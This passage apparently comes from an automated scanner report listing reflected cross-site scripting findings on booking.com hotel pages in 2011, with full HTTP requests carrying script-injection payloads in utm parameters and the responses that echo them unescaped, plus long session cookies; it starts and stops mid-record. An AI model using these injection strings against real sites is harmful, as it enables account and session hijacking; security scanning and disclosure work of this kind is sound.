XIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:16:42 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN4sTMjg6DJx7HaHS0Wu0DonGruQ19C5%2FA2qwp1uvnNC5LVmEZc%2FtD1X1w4xTGvBb2GiCt8D7ORFDe3lfF0wKb%2F4eRfndplWbbZBdA%2BdNjey38HBB9H87PxV8GQZGitP9QX%2FNyod6Bkp0m0Ju5c1Izs0OWVMihgahfjOq5lb5YlfKHjtv%2BGRD%2BdiWK0bVArxa55rxtIgmhzzt9B5jiQwAhC2HcCYbL%2Bik2%2BbWW3xbWYz6ArAHFU%2FggBlevuCC1e8o5g95315Zax1vM%2F7vROlc3mG3AsyIzl3gZQZ4YOmbxxbqOidFfQ8WZninFeO0Hrkw39lfF8GEW5v4HNMwOQ3O0XdBQdJkiOxnogCmPzOhYPj1AQkYU5WnZ93JH5pW9PWmQBYBoMktis1U9L22chjwgFmWifGS008LoqbPDAGAjVV93jZ9WHqddvgqeNj2ELsSF%2Fa7oWXGLV1lQNQHp3z8qG0nF%2FSc5qbI2zpHk%2FzcsarbQtDh%2FVEb0M6jPnpBwdck9ra06bI%2FHa9eSZgPTl%2BiBuvJ8fEI19V7UJ93t8frT8lxMmA0500oeTFRaQoTLSYrjE9J3Ks48m6CRCCSNjol7Zu8FPmo1ZeJmv3let1dEAWkl9fncFE6chn0Eew5RvH1qYOnzRG9HzfD%2F9GO7bODQK428cJkRpvuuDKCW5Na%2FxnJRnyBERbVgCMtTK5jkvHrFgJSyztVyFJ2jooOiitkP5MJ8nLmWjHMCECv48OgbxxtxjNuNBA09zzxJNktpjb1NzBr%2BrOs5Peo264Nn9MdHCrmDOimX5pyETtQGJiaD6eMATvQBiZ6dHVgDrFA79BncEFNlIUEpba4XgNFirf%2F%2F5wdQ1w3xYoXIoLGhkVWoMxD475%2Bh%2B5pAcTT3CFHEIYFRymlmqp4REahpEyBxosQxbdsrHhiF5Vuis7NwyvJ2A9FkiyvU31QhICtehHFundtnypbYtIZx%2BGlGkasdWnsH3WxoTZggAlcSzsDsqSDfQIp1eoZh3eWuRkzvtHxbtvM3a6JlrkgZm9BHe0J%2FSF8hFm4MnY3jrrZBqEkAgKIcDgdCeiIJnMU4vLwON86eAsl2%2FhGOESNU0kjjgQXgJl8sDPAf603qWgaNxSGA7sGqFS1Y5PfG4HhSSUGgPN2fH29jYOmqq7k3u6c6yKdqlmsup0uHhRmZRdxjWtJ1pPx6M%2FosFZyaFGwtmffZeM0iDGUSNliPMPzPIdThgqKZ2rZ943qErcPbrbrY6OwUxWx6ppbEtOJQfUF%2Bq2sLaUakFXKxKHJYgXwJ6VxOZiwKG1mFN%2FGGmSRgzgD2sr32RzdB%2B%2FVwDXtyBPrIJxxa5q2Snt4OOILnjoQVBEsdzCBIo4H9OCA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:16:43 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232522
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
= 'show automatic translation';
var transl_undo = 'undo';


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?4c610';alert(1)//55af9cf3306=1;utm_content=text-cr;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room =
...[SNIP]...

4.186. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_content parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the utm_content request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27066'-alert(1)-'d20d72902ca was submitted in the utm_content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr27066'-alert(1)-'d20d72902ca&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:13:18 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YWaiSgbFU5%2BGdtgREHFMYP9KL%2BXWDp4eXWLKqDT4JHK4Ck5t9jXCZSfgs8iZ0zc4fI%2FNmoyKuXU%2F74EgzaV72KBAwDEbn9K7SqcpEXhY0l1KJih5E2TOjss6weHL6zvPdgpsLLsf1oG%2BH7TzGNYU4bNvX1GP8SiLhTA%2FvdnRlJXj2q0%2FBKEyhlglZdav2FlTPKnBneyCmsuM36VOCkVAn5L2CkKQ1vOz1okhGPaUihOuFhSIzlj9Arejb62RiNeghkIEoeTA%2BgIdU4HfXEzFoQqkNfkE15VQpyDqYIaEjbaDqet4733cA3Z6Hq1c44TurbwalX%2BDTE4tp8U8NsDBuoTekaJj9Ek05Gb%2FrOAFOBOsT1niC1HH8F3Wcu4MiPLGvPW%2BXojhtsHuqxK6tJJEpM65v5%2FuBa3ahdAnP790KQdF%2FgY3Il%2B1bdrzgf4JiZf2hnnxm661d40W8AuxjF9%2BKprTgXAp%2B75A7JEY01wZYHFAldpGQ6d1dFpLCcx2tpjO2AazPLocxB%2BeW0PjQnekdA%2FPnRj%2FHNQs9d4w1NGpq7OCx9QAgYsm3eBU4WSkGUPKYJmcKeaj3eHs%2FVm%2BE8xb0um%2BlFRWOv8oyfA3bHI9vCkDY5cdU%2BTG1sjb802fhPCmSN8N55QS0fpgfp13E%2F%2FIYjh64GmXW%2FdcpPauCfyGFKnGT2cTV9exDpFLUDUcsR2sTp6MNzZz%2BDO13KFrgLHKvZbkDIXd8m4Nj51Yvwp1s3R15BXNpMqXuHhV60gbt1EKpTsGv%2B3tw%2BDwIMv6oz7U%2BvhS%2BM9FWIkhbMpKUu6VhApOl7hpKM5cO3%2BGkU2B%2FtRQaGLwTkrkgnxYkXAXjau8InPVw8U4XbGejs0fE7kJDcJ%2F%2F526LouDz9ExiypSN47xhvNURH5lOoO2jYozF4TSENjhXmBYWLLThEgMiQg1VvlAS4VLQyKpzIrSdNm0QV01D03KxQa4QSro9mMMn%2FElatjVJLkrmmJyAxqwk%2FKhyt936aftC1xLLWK2wICr6zLSiMa9%2FZ%2BeMeuIDP0pdL4NKYNlLD4nPQjKNZAjZmlmvGnlWcQhWjLfmSYFxi0FNlQkxLjau7efhEuuPqRsYQGaCba7mFaluu9j%2BgonYazJNlJHmpRa3gl2g07qvK93ZmKQqAV2bbJdUkmOESMhXPs4KmkhvCSxOdXCuPu2QJ7G%2F4yIi3qjSfG1b8Ntcak%2FlYoUioZ3XijOpGu1dUqDFBnSsWuD8EGVhnsybBlBBggpFSG32jmXD7mz0bp1Kh52E68wZwr9n%2BeX5ItiA9w6Wx0n1gsF9SQ52VM8QiIYN4kdDiixqGwTclU2G6oZeZZVYoMOpyp4vEGSle5bQUtTEl%2BiThbSbT9J7hxsMA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:13:19 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232453
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ranslation';
var transl_undo = 'undo';


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?utm_content=text-cr27066'-alert(1)-'d20d72902ca;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.gr
...[SNIP]...

4.187. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_content parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the utm_content request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d7f9"><script>alert(1)</script>995cb4fd7af was submitted in the utm_content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr6d7f9"><script>alert(1)</script>995cb4fd7af&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:13:09 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YUXdxg7pYYlMod8pxwXwXemRiCR%2FpP5P0BdBHUEcoqOr8OeCVCbcjwM4wWc3i3O3pAxy6qJC3X46sH7wfV3ds%2FYB3AbEQ%2BczeV6h8UE6Payuz4sBJbSKEktTExBBAezE6%2FaYGKn7YSGFnw%2B7T1OUQp8hkrjg1MQEOGEgtEuX8EO2MlXbBVTBp6oerTo5oyvYt31y9B5%2FT6hI8XLTKADNGdgpw0FMPmD9BlVmvx5tfuyXIDkCAjXVMMM2Py1vvORdqSzfLn6iq1MenqtuP2BXjEf5vt3nrB0G852NKzLgLOAn8z5NqI4H0hDCkw1yAaE16Oya%2Bj2Z0J7kHJJewm6sFIYDk%2FGuRyax%2BRQ5xEX4uTofLio48BYrsn3yfV0L0xfY%2B6SrjBAWNoUqMHZJZpKTGE%2BM5i9wzknjFGt2Dtfc5bv9UXspaEfCTWIxr3d%2Bzu1tQZYc1nIv2N8IQJZQDwa2E%2BjOGQLjzas%2Ffqo0ycnNvK8P17awitXipYuP%2FwJNvDykSTDsvsKOVenI6SpCOS7Ue9mLguJwwoWlTKgGhcE%2FYEMK8m%2B%2BmVQ1xR%2FhP8EQCJ7U0D1tP04%2B0jlbz9KBP%2FhDZxro5WrhOQfs5UPwqj7NrLrDIH1GxiGcAX8oIGH7Bcc9w1Yu6GL2jPnWUxyF2sOukQ4zcWhlpuBNk1R4WFxJd%2Fa9C7xt6ffLpe2i7XGMmZBUCHXVTOLGUdX3t6tkPlrhgs1v%2Ftsq2J5tHwKWUTzTjKDr49B8o7PMaqxDJsCL3SpS1F03NGmBsytBhhWAw0LDc71kTtjkq%2FQvVdTCiJhIXMcKSQ427IFCt1PeiR%2B%2B5%2BbzLg%2BSFbhlgYAhEsvGwtV6%2FALM7lE0eET%2BsKh2I1Ck%2F2THlZXkF%2FFK8A%2BVJ39jtm1R5bgR6CD00N6JvTi%2BKooGsfSSGWgE8ltBIFT7qEfFDVaFIBLx2FlT5bZq6FFwN6xT9v9b%2FQZ7ltcWCu9UaE%2FzPkAIgCkUnSRQh6Np8spT9vbzxxK1z2baWla%2FEdTD6mOinM50ia5Po6HzsUhKcgRgudfx%2Bu4B5NKDWODCAY33KUvL4aAc0NlWcYUjN6glEUkuQ8foBpmIwFhA95jEeVXk499yhPTLLunRa6Zqz2i1gPhKdXT%2Fv5wgfgm11%2FtxWuR24XrHTbmnvWoy4gG4ds7EuqLUBuqlXquWQ544uqeNqUZ24Ymcho%2FrfcHL5oqSQz6lidU%2BHMpG%2FAkKzTLiMe6TtE%2BPAGJ3izI8xRXnCouJfS%2BWr8hHkOUiPPXfZ1PPAXR7Np2ry47WyL5kqJxyia4XGq%2B6okw70cT9AMxPA3vk3UzGXxUGlHr4ICH7kLqnagj4%2FpcN5J9hA3k%2B0PNGyvHSvJJ9Wilye0U7CQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:13:10 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232637
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?utm_content=text-cr6d7f9"><script>alert(1)</script>995cb4fd7af;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554" />
...[SNIP]...

4.188. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_medium parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2b58"><script>alert(1)</script>a34ab4a00ee was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPCd2b58"><script>alert(1)</script>a34ab4a00ee&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:12:57 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdL0X2loyNGhkfPO6rvm8O2ZG3z%2BcatT%2B17ujnQNiNZeBAm%2FryzeQMya5S9PYPdK6inPiSJW3j1s0Wvwn%2FGlx5Ue2lu7qA1TICmOgWlTu%2FlSRUjk499sydT6gBGxPzpuukBKklZsdYu0viaHHNTsZ6Gt6LHIm5nSIp9mCRHJEh9gy3%2BrRkNKcw1CltVIAZHTHazUnSpInDMHKdpQJxqMEajQBL131rhAMIO7osOTfUUl1%2FUsySE6QzemE8tUy4qelKOg3aDBUF5%2BXDnaDYzYWBTzovMfNCeQY1u3OFu%2FcrE0EbDS7%2BsaFvZ8u%2B1g66aXjwx%2FG91a3X8yALwcRe%2Bwpw3vobKW9Fr%2FGAtK1uN3AscnAMvpTGmyjMIDZn%2FH6eLbGNVy2ZShVXkw3izHSnMuDlUoeyKrsnO3UQkewK1rg13HZ2Iay%2Fn3Az87x7qgV%2BDRapI1aR7wAZmZq3dXL4Hd0i2o1PbYlcxcgB4ZDyv2ZBMkKq2Uz%2FYcKq2FnRPVsdWqq%2F2YDjvpE5ELEFVOHHRYCjkeNoFZ%2BgMJoi8Ue5Mecu4tLrLC9tvEvev%2BmBiHArB7iLDR5mhtLZGZ9CKygkYtLH%2Fk30R3igE9lYLWIhNfO2qlIqPwFNYzGXm1bWEPvRsMX3sBKtsI3hmJASucc%2B1tPmN9%2FZSboQ4bNnWfAB6hOd7nJQadud%2Ftn%2BDjDEu%2BYk3YpTD%2FF0n%2FVmDmr34WwAqNnfETOhiCvrgIWrS3r9o4wiPtL26x5DqqSzeHMdJu7oJL0s1ssIMrnCEen9An2TSbCFiCd9b1IX1h6LUIjQN7VWFvawxbx3sa%2B5K%2FOaaNFNTTXzwZVL%2FDWsT9YDxeQrY%2BxIChN79XY5IwcEfUVE3i9HJCS%2BIKmfL7zIsbPvS5ojHmQr70PAdqhFOg79M%2FXdCP0xZ5DipU50RpXgxeAnF1TiTTolIzWwjg7rBK8WJqlw5Yd4FENZjj8wStoMAkFlj5GYE1Q%2BgYjz0B8WA9StN73sN1qdioJKWF8GJWZmSa9d%2BksZEGUmV386H%2Bu0GljDzoU4JV7ZgMsHErl9%2BJz15sD2xG73flzHTw5ZrbiVWwCPM6rjjsxyeIXn3%2FsVA39CpSHrujSaKCziNNvN4sBmgxjz%2B2rTI98zJrgba%2FRso5wMqjBp5UjCiEmDkM3VRI5Y4yay0xfLw4CJSRi1jyPBxK9ONakdiaAixiicye1ntV%2FCf8x0JUjtpmyD3Lct1RPliovhrzLj397QHQmWC9AY8CKpmBgC66s%2B%2F%2BXm8zxTrflvoUx7wQCzo6frqjccG2rFB9